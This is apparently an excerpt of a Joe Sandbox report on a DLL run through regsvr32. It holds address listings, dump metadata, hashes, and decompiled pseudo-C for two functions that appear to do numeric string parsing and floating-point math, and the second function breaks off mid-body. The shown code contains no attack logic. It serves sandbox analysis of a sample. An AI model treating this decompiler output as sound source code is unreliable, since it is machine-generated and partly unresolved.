                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13d
                                                                              0x1004f13f
                                                                              0x1004f141
                                                                              0x1004f141
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154
                                                                              0x1004ecc0
                                                                              0x1004ecc4
                                                                              0x1004eccc
                                                                              0x1004ecdc
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004f113

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 426438ca0c5c887131f4d831796d70f55c6f35a3acbccf1041d9f21b20cfacfa
                                                                              • Instruction ID: ed7a3cf7024db3cd0a2a2bb31865edfffad10d9a2d504599ad3a77998ecf1f14
                                                                              • Opcode Fuzzy Hash: 426438ca0c5c887131f4d831796d70f55c6f35a3acbccf1041d9f21b20cfacfa
                                                                              • Instruction Fuzzy Hash: C871F7776287C4C6D761CF25E0447AAB7A1F394780FA0502AEA89C3B68DB7DD945CF08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004EF1E Relevance: .2, Instructions: 181COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E1004EF1E(void* __ebx, intOrPtr __edx, unsigned long long __rax, void* __rbx, void* __rcx, void* __rdi, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r9, void* __r10, char* __r11, long long* __r13, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, intOrPtr _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296) {
				unsigned int _t137;
				signed short _t148;
				signed short _t149;
				signed short _t153;
				signed short _t154;
				signed int _t155;
				signed int _t159;
				signed int _t161;
				signed int _t175;
				signed int _t177;
				void* _t181;
				signed int _t182;
				signed int _t183;
				signed short _t184;
				signed short _t185;
				signed int _t187;
				signed int _t191;
				intOrPtr _t193;
				signed int _t194;
				signed short _t198;
				signed int _t199;
				signed int _t203;
				void* _t204;
				signed int _t205;
				signed int _t208;
				unsigned long long _t248;
				void* _t251;
				signed long long _t257;
				void* _t258;
				long long _t262;
				signed int* _t263;
				void* _t265;
				void* _t267;
				void* _t269;
				signed long long _t271;
				intOrPtr* _t273;
				void* _t275;
				signed int* _t276;
				void* _t277;
				signed int _t278;
				char* _t279;
				char* _t280;
				signed short* _t281;
				long long* _t283;
				signed int* _t286;

				_t283 = __r13;
				_t279 = __r11;
				_t277 = __r10;
				_t275 = __r9;
				_t273 = __r8;
				_t269 = __rbp;
				_t267 = __rsi;
				_t265 = __rdi;
				_t251 = __rbx;
				_t248 = __rax;
				_t193 = __edx;
				_t181 = __ebx;
				r15d = 1;
				if(r10d != 0 || __edx != 0x30) {
					L3:
					if(_t193 < 0x30) {
						L8:
						if(_t193 + 0xffffffd5 > 0x3a) {
							_t273 = _t273 - _t269;
							_t203 = 0;
							 *_t283 = _t273;
							if(1 == 0) {
								r8d = 0;
								_t194 = 0;
								_t203 = 4;
								goto L104;
							} else {
								if(r10d <= 0x18) {
									goto L16;
								}
								_t177 = _a151 & 0x000000ff;
								if(_t177 >= 5) {
									_a151 = _t177 + 1;
								}
								_t279 = _t279 - 1;
								r10d = 0x18;
								_t181 = _t181 + 1;
								L17:
								_t280 = _t279 - 1;
								if( *_t280 != 0) {
									L20:
									_t9 =  &_a96; // 0x61
									_t10 =  &_a128; // 0x81
									E10052690(r10d, _t251, _t10, 0x10000000, _t265, _t267, _t9, _t275, _t277, _t280);
									if(r14d >= 0) {
										r8d = _a48;
									} else {
										r8d = _a48;
										r8d =  ~r8d;
									}
									r8d = r8d + _t181;
									if(r12d == 0) {
										r8d = r8d + _a288;
									}
									if(r15d == 0) {
										r8d = r8d - _a296;
									}
									if(r8d > 0x1450) {
										_t194 = _t203;
										_t137 = 0x7fff;
										r8d = 0x80000000;
										_t203 = 2;
										_t183 = 0;
										goto L105;
									} else {
										if(r8d < 0xffffebb0) {
											r8d = _t203;
											_t194 = _t203;
											_t203 = 1;
											L104:
											_t183 = 0;
											_t137 = 0;
											__eflags = 0;
											L105:
											_t276 = _a72;
											_t276[2] = _t137 | _a52;
											 *_t276 = _t183;
											_t276[0] = _t194;
											_t276[1] = r8d;
											return E10038D20(_t183, _a160 ^ _t271);
										}
										_t262 = 0x10070ac0;
										if(r8d == 0) {
											L99:
											_t183 = _a96 & 0x0000ffff;
											_t194 = _a98;
											r8d = _a102;
											_t137 = _a104 >> 0x10;
											goto L105;
										}
										if(r8d < 0) {
											r8d =  ~r8d;
											_t262 = 0x10070c20;
										}
										_t144 =  ==  ? 0 : _a96 & 0x0000ffff;
										_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
										if(r8d == 0) {
											_t203 = 0;
											__eflags = 0;
										} else {
											r9d = 0xffff8000;
											do {
												_t262 = _t262 + 0x54;
												r8d = r8d >> 3;
												_a48 = r8d;
												_a64 = _t262;
												if((r8d & 0x00000007) == 0) {
													goto L96;
												}
												_t257 = _t248 + _t248 * 2;
												_t286 = _t262 + _t257 * 4;
												if( *((short*)(_t262 + _t257 * 4)) >= 0x8000) {
													_t26 =  &_a112; // 0x71
													_t257 = _t26;
													 *_t257 =  *_t286;
													_t175 = _t286[2];
													_t28 =  &_a112; // 0x71
													_t286 = _t28;
													 *(_t257 + 8) = _t175;
													_t248 = _a112 >> 0x10;
													_a114 = _t175 - 1;
												}
												_t184 = _t286[2] & 0x0000ffff;
												_t148 = _a106 & 0x0000ffff;
												r15d = 0;
												_t185 = _t184 & 0x00007fff;
												_a80 = 0;
												_t149 = _t148 & 0x00007fff;
												_a84 = 0;
												_t198 = (_t184 & 0x0000ffff ^ _t148) & 0x00008000;
												_a88 = 0;
												_a56 = _t198;
												_t204 = _t248 + _t257;
												if(_t149 >= 0x7fff || _t185 >= 0x7fff || _t204 > 0xbffd) {
													__eflags = _t198;
													_t262 = _a64;
													_t151 =  !=  ? r9d : 0x7fff8000;
													_a100 = 0;
													_a96 = 0;
													_a104 =  !=  ? r9d : 0x7fff8000;
												} else {
													if(_t204 > 0x3fbf) {
														__eflags = _t149;
														if(_t149 != 0) {
															L47:
															__eflags = _t185;
															if(_t185 != 0) {
																L52:
																r13d = 0;
																_t263 =  &_a84;
																r12d = 5;
																do {
																	__eflags = r12d;
																	_t182 = r12d;
																	_t258 = _t283 + _t283;
																	if(r12d <= 0) {
																		goto L67;
																	}
																	_t56 =  &(_t286[2]); // 0x9
																	_t278 = _t56;
																	_t58 = _t258 + 0x60; // 0x65
																	_t281 = _t271 + _t58;
																	_t208 = r13d & 0x00000001;
																	__eflags = _t208;
																	do {
																		_t187 = ( *_t281 & 0x0000ffff) * ( *_t278 & 0x0000ffff);
																		__eflags = _t208;
																		if(_t208 == 0) {
																			r8d = 0;
																			r9d = _t248 + _t258;
																			__eflags = r9d -  *(_t263 - 4);
																			if(r9d <  *(_t263 - 4)) {
																				L62:
																				r8d = 1;
																				L63:
																				 *(_t263 - 4) = r9d;
																				goto L64;
																			}
																			__eflags = r9d - _t187;
																			if(r9d >= _t187) {
																				goto L63;
																			}
																			goto L62;
																		}
																		r8d = 0;
																		r9d = _t248 + _t258;
																		__eflags = r9d -  *(_t263 - 4);
																		if(r9d <  *(_t263 - 4)) {
																			L58:
																			r8d = 1;
																			L59:
																			 *(_t263 - 4) = r9d;
																			goto L64;
																		}
																		__eflags = r9d - _t187;
																		if(r9d >= _t187) {
																			goto L59;
																		}
																		goto L58;
																		L64:
																		__eflags = r8d;
																		if(r8d != 0) {
																			 *_t263 =  *_t263 + 1;
																			__eflags =  *_t263;
																		}
																		_t182 = _t182 - 1;
																		_t281 =  &(_t281[1]);
																		_t278 = _t278 - 2;
																		__eflags = _t182;
																	} while (_t182 > 0);
																	L67:
																	r12d = r12d - 1;
																	_t263 =  &(_t263[0]);
																	r13d = r13d + 1;
																	__eflags = r12d;
																} while (r12d > 0);
																_t205 = _t204 + 0xc002;
																__eflags = _t205;
																if(__eflags <= 0) {
																	r8d = _a88;
																	_t199 = _a84;
																	r9d = _a80;
																	L82:
																	_t205 = _t205 + 0xffff;
																	__eflags = _t205;
																	if(_t205 >= 0) {
																		L74:
																		_t153 = _a80 & 0x0000ffff;
																		L75:
																		__eflags = _t153 - 0x8000;
																		if(_t153 > 0x8000) {
																			L77:
																			_t154 = _a82;
																			__eflags = _t154 - 0xffffffff;
																			if(_t154 != 0xffffffff) {
																				_t155 = _t154 + 1;
																				__eflags = _t155;
																				_a82 = _t155;
																				_t199 = _a84;
																			} else {
																				_t159 = _a86;
																				_a82 = 0;
																				__eflags = _t159 - 0xffffffff;
																				if(_t159 != 0xffffffff) {
																					_a86 = _t159 + 1;
																					r8d = _a88;
																					_t199 = _a84;
																				} else {
																					_t161 = _a90 & 0x0000ffff;
																					_a86 = 0;
																					__eflags = _t161 - 0xffff;
																					if(_t161 != 0xffff) {
																						_t199 = _a84;
																						_a90 = _t161 + 1;
																						r8d = _a88;
																					} else {
																						_t199 = _a84;
																						_a90 = 0x8000;
																						r8d = _a88;
																						_t205 = _t205 + 1;
																					}
																				}
																			}
																			L92:
																			__eflags = _t205 - 0x7fff;
																			if(_t205 < 0x7fff) {
																				_a98 = _t199;
																				_t262 = _a64;
																				_a102 = r8d;
																				r8d = _a48;
																				_a96 = _a82 & 0x0000ffff;
																				_a106 = _t205 | _a56;
																				r9d = 0xffff8000;
																			} else {
																				__eflags = _a56;
																				_t262 = _a64;
																				r8d = _a48;
																				r9d = 0xffff8000;
																				_a100 = 0;
																				_t158 =  !=  ? r9d : 0x7fff8000;
																				_a96 = 0;
																				_a104 =  !=  ? r9d : 0x7fff8000;
																			}
																			goto L96;
																		}
																		r9d = r9d & 0x0001ffff;
																		__eflags = r9d - 0x18000;
																		if(r9d != 0x18000) {
																			goto L92;
																		}
																		goto L77;
																	}
																	r10d =  ~(_t205 & 0x0000ffff) & 0x0000ffff;
																	_t205 = _t205 + r10w;
																	__eflags = _t205;
																	do {
																		__eflags = _a80 & 0x00000001;
																		if((_a80 & 0x00000001) != 0) {
																			r15d = r15d + 1;
																			__eflags = r15d;
																		}
																		r9d = r9d >> 1;
																		r9d = r9d | _t199 << 0x0000001f;
																		r8d = r8d >> 1;
																		_t199 = _t199 >> 0x00000001 | r8d << 0x0000001f;
																		_t278 = _t278 - 1;
																		__eflags = _t278;
																		_a80 = r9d;
																	} while (_t278 != 0);
																	__eflags = r15d;
																	_a84 = _t199;
																	_a88 = r8d;
																	if(r15d == 0) {
																		goto L74;
																	}
																	_t153 = r9w | 0x00000001;
																	_a80 = _t153;
																	r9d = _a80;
																	goto L75;
																}
																r8d = _a88;
																_t199 = _a84;
																r9d = _a80;
																while(1) {
																	asm("inc ecx");
																	if(__eflags < 0) {
																		break;
																	}
																	r8d = r8d + r8d;
																	_t191 = _t199 >> 0x1f;
																	r9d = r9d + r9d;
																	_t199 = _t199 + _t199 | r9d >> 0x0000001f;
																	r8d = r8d | _t191;
																	_t205 = _t205 + 0xffff;
																	_a84 = _t199;
																	_a88 = r8d;
																	__eflags = _t205;
																	_a80 = r9d;
																	if(__eflags > 0) {
																		continue;
																	}
																	goto L82;
																}
																__eflags = _t205;
																if(_t205 <= 0) {
																	goto L82;
																}
																goto L74;
															}
															_t204 = _t204 + 1;
															asm("btr eax, 0x1f");
															__eflags = _t286[2];
															if(_t286[2] != 0) {
																goto L52;
															}
															__eflags = _t286[1];
															if(_t286[1] != 0) {
																goto L52;
															}
															__eflags =  *_t286;
															if( *_t286 != 0) {
																goto L52;
															}
															_t262 = _a64;
															_a104 = 0;
															_a100 = 0;
															_a96 = 0;
															goto L96;
														}
														_t204 = _t204 + 1;
														asm("btr eax, 0x1f");
														__eflags = _a104;
														if(_a104 != 0) {
															goto L47;
														}
														__eflags = _a100;
														if(_a100 != 0) {
															goto L47;
														}
														__eflags = _a96;
														if(_a96 != 0) {
															goto L47;
														}
														_t262 = _a64;
														_a106 = 0;
														goto L96;
													}
													_t262 = _a64;
													_a104 = 0;
													_a100 = 0;
													_a96 = 0;
												}
												L96:
											} while (r8d != 0);
											_t203 = 0;
										}
										goto L99;
									}
								}
								do {
									_t280 = _t280 - 1;
									r10d = r10d + 0xffffffff;
									_t181 = _t181 + 1;
								} while ( *_t280 == 0);
								goto L20;
							}
							L16:
							__eflags = r10d;
							if(r10d == 0) {
								r8d = 0;
								_t194 = 0;
								goto L104;
							}
							goto L17;
						}
						goto __rcx;
					}
					while(_t193 <= 0x39) {
						if(r10d < 0x19) {
							r10d = r10d + 1;
							 *_t279 = _t193 - 0x30;
							_t279 = _t279 + _t269;
							_t181 = _t181 - 1;
						}
						_t193 =  *_t273;
						_t273 = _t273 + _t269;
						if(_t193 >= 0x30) {
							continue;
						}
						goto L8;
					}
					goto L8;
				} else {
					do {
						_t193 =  *_t273;
						_t181 = _t181 - 1;
						_t273 = _t273 + __rbp;
					} while (_t193 == 0x30);
					goto L3;
				}
			}
















































                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef1e
                                                                              0x1004ef26
                                                                              0x1004ef29
                                                                              0x1004ef3d
                                                                              0x1004ef40
                                                                              0x1004ef66
                                                                              0x1004ef6f
                                                                              0x1004f179
                                                                              0x1004f17c
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x00000000
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f135
                                                                              0x1004f13f
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f2a8
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2d7
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f20f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f212
                                                                              0x1004ef90
                                                                              0x1004ef90
                                                                              0x1004ef42
                                                                              0x1004ef4b
                                                                              0x1004ef50
                                                                              0x1004ef53
                                                                              0x1004ef56
                                                                              0x1004ef59
                                                                              0x1004ef59
                                                                              0x1004ef5b
                                                                              0x1004ef5e
                                                                              0x1004ef64
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004ef64
                                                                              0x00000000
                                                                              0x1004ef30
                                                                              0x1004ef30
                                                                              0x1004ef30
                                                                              0x1004ef33
                                                                              0x1004ef35
                                                                              0x1004ef38
                                                                              0x00000000
                                                                              0x1004ef30

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d20cd5754390a74b2231b6ab07041b52bb05280149a5dd7081266211bcc9df00
                                                                              • Instruction ID: 2b39823d17e2840f4250fa0884803b5ebeb86b72836defce9d08e0be051bf89f
                                                                              • Opcode Fuzzy Hash: d20cd5754390a74b2231b6ab07041b52bb05280149a5dd7081266211bcc9df00
                                                                              • Instruction Fuzzy Hash: 826155B76287C5C6C761CF29D0443BAB7A1F380780FA1412AEA89C3A59DB7DC944CF08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004ED79 Relevance: .2, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E1004ED79(void* __ebx, unsigned long long __rdx, long long __r8, void* __r11, long long* __r13) {
				unsigned int _t147;
				signed int _t148;
				signed short _t158;
				signed short _t159;
				signed short _t163;
				signed short _t164;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed char _t188;
				void* _t191;
				signed int _t192;
				signed int _t193;
				signed short _t194;
				signed short _t195;
				signed int _t197;
				signed int _t201;
				void* _t204;
				signed int _t205;
				signed short _t209;
				signed int _t210;
				signed int _t214;
				void* _t215;
				signed int _t216;
				signed int _t219;
				void* _t229;
				signed long long _t236;
				void* _t237;
				long long _t241;
				signed int* _t242;
				void* _t244;
				intOrPtr* _t246;
				void* _t248;
				signed long long _t250;
				void* _t254;
				signed int* _t255;
				void* _t256;
				signed int _t257;
				void* _t258;
				char* _t259;
				signed short* _t260;
				long long* _t262;
				signed int* _t265;

				_t262 = __r13;
				_t258 = __r11;
				_t252 = __r8;
				_t239 = __rdx;
				_t191 = __ebx;
				if(__rdx - 0x31 > 8) {
					_t224 =  *((intOrPtr*)( *((intOrPtr*)( *_t246 + 0x128))));
					__eflags = _t204 -  *_t224;
					if(_t204 !=  *_t224) {
						__eflags = _t204 + 0xffffffd5 - 0x3a;
						if(_t204 + 0xffffffd5 > 0x3a) {
							_t252 = __r8 - _t248;
							_t214 = 0;
							goto L10;
						}
						_t239 = 0x10000000;
						goto __rcx;
					}
					r9d = 4;
				} else {
					_t6 = _t248 + 2; // 0x3
					r9d = _t6;
